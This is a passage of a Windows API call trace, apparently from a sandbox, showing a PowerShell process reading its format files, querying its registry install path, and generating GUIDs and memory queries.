	[0430.663] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.664] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.664] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.664] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.664] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.664] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.664] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.664] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.665] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.665] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.665] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.665] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.665] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.666] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.666] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.666] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.666] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.666] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0xe67, lpOverlapped=0x0) returned 1
	[0430.666] ReadFile (in: hFile=0x1c8, lpBuffer=0x3baf327, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3baf327*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.666] ReadFile (in: hFile=0x1c8, lpBuffer=0x3bafd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3bafd58*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.667] SetErrorMode (uMode=0x1) returned 0x1
	[0430.667] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfa0 | out: lpFileInformation=0x26cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0430.667] SetErrorMode (uMode=0x1) returned 0x1
	[0430.667] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x1c8) returned 0x0
	[0430.667] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d00c, lpData=0x0, lpcbData=0x26d008*=0x0 | out: lpType=0x26d00c*=0x1, lpData=0x0, lpcbData=0x26d008*=0x56) returned 0x0
	[0430.667] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2ef0
	[0430.667] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cfdc, lpData=0x1b9a2ef0, lpcbData=0x26cfd8*=0x56 | out: lpType=0x26cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26cfd8*=0x56) returned 0x0
	[0430.667] CoTaskMemFree (pv=0x1b9a2ef0) 
	[0430.667] RegCloseKey (hKey=0x1c8) returned 0x0
	[0430.669] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x31163e3a, Data2=0xb513, Data3=0x49da, Data4=([0]=0xbd, [1]=0x7f, [2]=0x85, [3]=0x83, [4]=0x79, [5]=0x34, [6]=0xd5, [7]=0x41))) returned 0x0
	[0430.669] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x516a8417, Data2=0x756c, Data3=0x4282, Data4=([0]=0x87, [1]=0x9b, [2]=0xf6, [3]=0x71, [4]=0xba, [5]=0xbf, [6]=0x19, [7]=0x75))) returned 0x0
	[0430.669] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x55c7d806, Data2=0xa09b, Data3=0x41f5, Data4=([0]=0x90, [1]=0x0, [2]=0xac, [3]=0x74, [4]=0x42, [5]=0xdf, [6]=0x51, [7]=0x4b))) returned 0x0
	[0430.670] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xbc265056, Data2=0xaba8, Data3=0x4b55, Data4=([0]=0x81, [1]=0xc1, [2]=0x4a, [3]=0x5a, [4]=0x82, [5]=0xc, [6]=0x58, [7]=0xca))) returned 0x0
	[0430.670] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x35a80ff8, Data2=0xf4d6, Data3=0x4a23, Data4=([0]=0x91, [1]=0xdf, [2]=0xe7, [3]=0x5e, [4]=0x89, [5]=0x64, [6]=0x5e, [7]=0x9d))) returned 0x0
	[0430.670] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x7ba53adb, Data2=0xebab, Data3=0x4eb7, Data4=([0]=0x80, [1]=0xe5, [2]=0xa0, [3]=0xe6, [4]=0x17, [5]=0x80, [6]=0x8d, [7]=0x42))) returned 0x0
	[0430.670] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x7c7c399d, Data2=0x29fc, Data3=0x4e9b, Data4=([0]=0xb4, [1]=0x5d, [2]=0x79, [3]=0x70, [4]=0x8c, [5]=0xbc, [6]=0x2b, [7]=0x71))) returned 0x0
	[0430.670] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.670] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xdcc2f777, Data2=0x7d86, Data3=0x4419, Data4=([0]=0xb2, [1]=0xf5, [2]=0xac, [3]=0x60, [4]=0x52, [5]=0xe0, [6]=0x5d, [7]=0x57))) returned 0x0
	[0430.670] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x4310d6b3, Data2=0x444, Data3=0x4cc7, Data4=([0]=0x82, [1]=0x8d, [2]=0x53, [3]=0x36, [4]=0x41, [5]=0x6f, [6]=0x43, [7]=0xb8))) returned 0x0
	[0430.670] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x9013408c, Data2=0x3298, Data3=0x4a35, Data4=([0]=0xa7, [1]=0xb1, [2]=0x5b, [3]=0xbb, [4]=0xd7, [5]=0xc1, [6]=0xc5, [7]=0x5))) returned 0x0
	[0430.671] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x4e46882d, Data2=0x38c7, Data3=0x43bf, Data4=([0]=0xbd, [1]=0x34, [2]=0x12, [3]=0x65, [4]=0xbf, [5]=0x50, [6]=0xd1, [7]=0x2f))) returned 0x0
	[0430.671] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xfa1a1eae, Data2=0x2a7, Data3=0x4f10, Data4=([0]=0x88, [1]=0xfd, [2]=0x66, [3]=0xc6, [4]=0x5c, [5]=0x18, [6]=0x63, [7]=0xf9))) returned 0x0
	[0430.671] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x41342ea5, Data2=0x5639, Data3=0x4816, Data4=([0]=0x91, [1]=0xf5, [2]=0x8b, [3]=0x86, [4]=0x9b, [5]=0xf9, [6]=0x89, [7]=0x16))) returned 0x0
	[0430.671] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x6276117c, Data2=0xf980, Data3=0x466c, Data4=([0]=0x84, [1]=0xbd, [2]=0x1f, [3]=0x1e, [4]=0x8f, [5]=0xb4, [6]=0xd3, [7]=0xec))) returned 0x0
	[0430.671] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xf95933ee, Data2=0xb0e2, Data3=0x4e73, Data4=([0]=0xac, [1]=0xb5, [2]=0x50, [3]=0xda, [4]=0x80, [5]=0x61, [6]=0x95, [7]=0x2c))) returned 0x0
	[0430.671] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x447ea409, Data2=0x6171, Data3=0x4ab5, Data4=([0]=0x82, [1]=0x19, [2]=0x22, [3]=0xd4, [4]=0x54, [5]=0x73, [6]=0xcc, [7]=0xe4))) returned 0x0
	[0430.671] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xbb0afbdb, Data2=0x13d5, Data3=0x4b81, Data4=([0]=0xa3, [1]=0x59, [2]=0xe7, [3]=0x6e, [4]=0x6e, [5]=0x69, [6]=0xe2, [7]=0xad))) returned 0x0
	[0430.671] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x6c279c31, Data2=0x1bce, Data3=0x40bf, Data4=([0]=0x89, [1]=0x3b, [2]=0x5f, [3]=0x74, [4]=0xde, [5]=0xc3, [6]=0xa3, [7]=0x39))) returned 0x0
	[0430.672] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x44a565e8, Data2=0x889c, Data3=0x4c80, Data4=([0]=0x85, [1]=0x15, [2]=0x1d, [3]=0x7e, [4]=0xda, [5]=0x9c, [6]=0x56, [7]=0x91))) returned 0x0
	[0430.672] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.672] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.724] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.725] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xd5fe70a1, Data2=0xaa00, Data3=0x49fe, Data4=([0]=0xad, [1]=0xbd, [2]=0x65, [3]=0x0, [4]=0x7d, [5]=0xc1, [6]=0x5a, [7]=0xad))) returned 0x0
	[0430.725] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x6bae0445, Data2=0x1225, Data3=0x42b4, Data4=([0]=0x8a, [1]=0xaf, [2]=0xa, [3]=0xe3, [4]=0xfe, [5]=0xff, [6]=0x30, [7]=0xb3))) returned 0x0
	[0430.725] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xb1f238a6, Data2=0xaadc, Data3=0x4576, Data4=([0]=0x93, [1]=0x12, [2]=0xac, [3]=0x24, [4]=0x5, [5]=0xa8, [6]=0xbb, [7]=0x59))) returned 0x0
	[0430.725] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x50be68cb, Data2=0x5dbc, Data3=0x4c79, Data4=([0]=0xa0, [1]=0x7b, [2]=0xf7, [3]=0xa7, [4]=0x90, [5]=0xd0, [6]=0x73, [7]=0xf2))) returned 0x0
	[0430.725] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x44aa99be, Data2=0xfcf2, Data3=0x408e, Data4=([0]=0xbf, [1]=0x54, [2]=0xda, [3]=0x4d, [4]=0x3b, [5]=0x5a, [6]=0xa5, [7]=0x33))) returned 0x0
	[0430.725] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x98d3666c, Data2=0xaf81, Data3=0x4265, Data4=([0]=0xb0, [1]=0x68, [2]=0xf5, [3]=0x6a, [4]=0xe3, [5]=0x31, [6]=0x50, [7]=0x28))) returned 0x0
	[0430.725] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xa9b56f10, Data2=0x5b54, Data3=0x491a, Data4=([0]=0xa0, [1]=0xc2, [2]=0xdd, [3]=0xa5, [4]=0x2c, [5]=0x3d, [6]=0x3d, [7]=0xe7))) returned 0x0
	[0430.726] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xd2c388f2, Data2=0x4d7, Data3=0x4cdc, Data4=([0]=0xb4, [1]=0x29, [2]=0x6b, [3]=0xdf, [4]=0x71, [5]=0x33, [6]=0x31, [7]=0x33))) returned 0x0
	[0430.726] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x67685069, Data2=0xbcca, Data3=0x4b0b, Data4=([0]=0x89, [1]=0x2a, [2]=0x13, [3]=0xc9, [4]=0x89, [5]=0xba, [6]=0xdd, [7]=0x93))) returned 0x0
	[0430.726] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xee798916, Data2=0x6bb1, Data3=0x4192, Data4=([0]=0xa7, [1]=0x34, [2]=0x34, [3]=0x9f, [4]=0x71, [5]=0xcc, [6]=0x5a, [7]=0xb8))) returned 0x0
	[0430.726] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x38189021, Data2=0xcabe, Data3=0x4d74, Data4=([0]=0xb9, [1]=0xa1, [2]=0x8, [3]=0x6a, [4]=0x46, [5]=0x48, [6]=0xca, [7]=0xa3))) returned 0x0
	[0430.726] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xb17093f3, Data2=0x9c5c, Data3=0x42e1, Data4=([0]=0xb5, [1]=0xb9, [2]=0x3a, [3]=0xed, [4]=0x1b, [5]=0xfe, [6]=0xee, [7]=0xe6))) returned 0x0
	[0430.726] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xddbb0fe9, Data2=0x4fb6, Data3=0x4902, Data4=([0]=0xb9, [1]=0x4f, [2]=0xd4, [3]=0x8a, [4]=0xb3, [5]=0x7d, [6]=0x25, [7]=0x7e))) returned 0x0
	[0430.726] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.726] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x4c514246, Data2=0x1c26, Data3=0x4eec, Data4=([0]=0x98, [1]=0xc3, [2]=0x30, [3]=0xb6, [4]=0xe5, [5]=0x68, [6]=0x53, [7]=0x65))) returned 0x0
	[0430.727] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.727] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.728] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x319318d1, Data2=0x6cc0, Data3=0x4cb1, Data4=([0]=0x9f, [1]=0x6e, [2]=0xf0, [3]=0xae, [4]=0x9d, [5]=0xb5, [6]=0xae, [7]=0xd1))) returned 0x0
	[0430.729] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.729] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x4834e7c8, Data2=0xb076, Data3=0x4486, Data4=([0]=0x8c, [1]=0x7a, [2]=0x99, [3]=0x9d, [4]=0xa8, [5]=0xc0, [6]=0x24, [7]=0x17))) returned 0x0
	[0430.729] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1351c72e, Data2=0xc1a5, Data3=0x4229, Data4=([0]=0x92, [1]=0xa3, [2]=0x1b, [3]=0x82, [4]=0xab, [5]=0x51, [6]=0x19, [7]=0xe4))) returned 0x0
	[0430.729] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x4228b56d, Data2=0x4ce7, Data3=0x4b2a, Data4=([0]=0xb0, [1]=0xef, [2]=0x3e, [3]=0xf8, [4]=0x8e, [5]=0x20, [6]=0xaf, [7]=0x0))) returned 0x0
	[0430.729] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x12fed61c, Data2=0xb390, Data3=0x4ac5, Data4=([0]=0x9e, [1]=0x1f, [2]=0x54, [3]=0xb2, [4]=0x4e, [5]=0xf1, [6]=0x3e, [7]=0xb9))) returned 0x0
	[0430.729] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1524c8c5, Data2=0xfa95, Data3=0x423c, Data4=([0]=0x9e, [1]=0xf0, [2]=0xa0, [3]=0x2c, [4]=0x7b, [5]=0x1a, [6]=0x79, [7]=0xc0))) returned 0x0
	[0430.729] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x4f5b0242, Data2=0x91d2, Data3=0x4aa0, Data4=([0]=0xbf, [1]=0x25, [2]=0x7d, [3]=0x36, [4]=0x5, [5]=0xf, [6]=0x1b, [7]=0x3))) returned 0x0
	[0430.730] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x7d720cb2, Data2=0x601f, Data3=0x4b40, Data4=([0]=0xa2, [1]=0xf9, [2]=0x3d, [3]=0xc4, [4]=0x7b, [5]=0xdb, [6]=0x78, [7]=0x57))) returned 0x0
	[0430.730] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.730] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x69eafa63, Data2=0x3a73, Data3=0x47ad, Data4=([0]=0xbb, [1]=0x5, [2]=0x37, [3]=0x2, [4]=0x8a, [5]=0xfd, [6]=0xc9, [7]=0xd3))) returned 0x0
	[0430.730] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x38d6f7ff, Data2=0x610a, Data3=0x4bd5, Data4=([0]=0x83, [1]=0xaf, [2]=0xf6, [3]=0xb0, [4]=0x7c, [5]=0x2, [6]=0xe4, [7]=0x56))) returned 0x0
	[0430.730] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x6a789628, Data2=0xabfd, Data3=0x47e1, Data4=([0]=0x92, [1]=0xa9, [2]=0x30, [3]=0x87, [4]=0x16, [5]=0x25, [6]=0x3f, [7]=0x85))) returned 0x0
	[0430.730] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x620254a5, Data2=0xd849, Data3=0x4131, Data4=([0]=0x9a, [1]=0xf0, [2]=0xe7, [3]=0x57, [4]=0xa4, [5]=0x5d, [6]=0xf0, [7]=0xe4))) returned 0x0
	[0430.731] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x67cbf056, Data2=0xecf, Data3=0x4642, Data4=([0]=0xaf, [1]=0x5c, [2]=0x1b, [3]=0x64, [4]=0x5b, [5]=0x1, [6]=0x83, [7]=0x9))) returned 0x0
	[0430.731] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.731] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x15927fea, Data2=0x92, Data3=0x4c90, Data4=([0]=0xab, [1]=0xed, [2]=0xee, [3]=0x23, [4]=0xf8, [5]=0x35, [6]=0x54, [7]=0x4c))) returned 0x0
	[0430.731] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x53f0e6e, Data2=0x79, Data3=0x466a, Data4=([0]=0xa3, [1]=0x6, [2]=0xb3, [3]=0x96, [4]=0x21, [5]=0x6c, [6]=0xd8, [7]=0xe4))) returned 0x0
	[0430.731] VirtualQuery (in: lpAddress=0x26bcd0, lpBuffer=0x26cb90, dwLength=0x30 | out: lpBuffer=0x26cb90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.731] VirtualQuery (in: lpAddress=0x26bcd0, lpBuffer=0x26cb90, dwLength=0x30 | out: lpBuffer=0x26cb90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.731] VirtualQuery (in: lpAddress=0x26bcd0, lpBuffer=0x26cb90, dwLength=0x30 | out: lpBuffer=0x26cb90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.732] VirtualQuery (in: lpAddress=0x26bcd0, lpBuffer=0x26cb90, dwLength=0x30 | out: lpBuffer=0x26cb90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.732] SetErrorMode (uMode=0x1) returned 0x1
	[0430.732] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0430.732] SetErrorMode (uMode=0x1) returned 0x1
	[0430.732] GetFileType (hFile=0x1c8) returned 0x1
	[0430.732] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d0dcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d0dcf0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.733] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d0dcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d0dcf0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.733] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d0dcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d0dcf0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.733] ReadFile (in: hFile=0x1c8, lpBuffer=0x3d0dcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3d0dcf0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
